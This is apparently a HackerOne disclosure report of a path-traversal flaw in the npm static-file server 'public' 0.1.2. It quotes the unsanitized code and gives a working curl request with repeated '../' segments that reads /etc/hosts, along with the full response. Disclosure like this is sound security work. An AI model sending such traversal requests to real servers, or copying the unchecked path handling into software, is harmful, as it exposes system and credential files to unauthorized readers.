Hi Guys,
There is a Path Traversal vulnerability in the public module.
It allows reading the content of arbitrary files on the remote server.
public
Run static file hosting server with specified public dir & port. Support a "directory index" like Apache httpd.
https://www.npmjs.com/package/public
version: 0.1.2
Stats
3 downloads in the last day
30 downloads in the last week
384 downloads in the last month
~4600 estimated downloads per year
The lack of file path sanitization means that any file on the server can be read by a malicious user.
The vulnerability exists because the request path is used without any check against Path Traversal attacks:
```javascript
// node_modules/public/bin/public, line 73:
var pathname = url.parse(req.url).pathname;
var filePath = path.join(dir, pathname); // Real file path (path.join normalizes "..", so it can leave dir)
var base = filePath.replace(dir, ''); // Base path for browser link
var abs = path.resolve(filePath);
console.log(new Date().toString(), abs);
fs.readFile(filePath, function(err, data) {
  if (err) {
    (...)
  }
  res.writeHead(200, { 'Content-Type': mime.lookup(filePath) });
  res.end(data);
```
As you can see, filePath is built directly from the pathname read from the URL and passed to fs.readFile without any containment check.
1. Install public:
```
$ npm install public
```
2. Run public in a directory of your choice:
```
me:~/playground/hackerone/Node$ ./node_modules/public/bin/public ./ 8080
Public.js server running with "/home/rafal.janicki/playground/hackerone/Node" on port 8080
```
3. Run the curl command (adjust the number of ../ to reflect your system):
```
$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../etc/hosts
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /../../../../../etc/hosts HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< last-modified: Tue, 23 Jan 2018 14:51:52 GMT
< content-length: 188
< content-type: application/octet-stream
< Date: Tue, 06 Feb 2018 15:40:51 GMT
< Connection: keep-alive
<
127.0.0.1 localhost
127.0.1.1 LT0081U2
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host 127.0.0.1 left intact
```
Please feel free to invite the module maintainer to this report. I haven't contacted the maintainer as I want to keep the process of fixing and disclosing the bug consistent through the HackerOne platform only.
I hope my report will help to keep the Node.js ecosystem and its users safe in the future.
Regards,
Rafal ‘bl4de’ Janicki
This vulnerability allows reading the content of arbitrary files from the server where the module is run.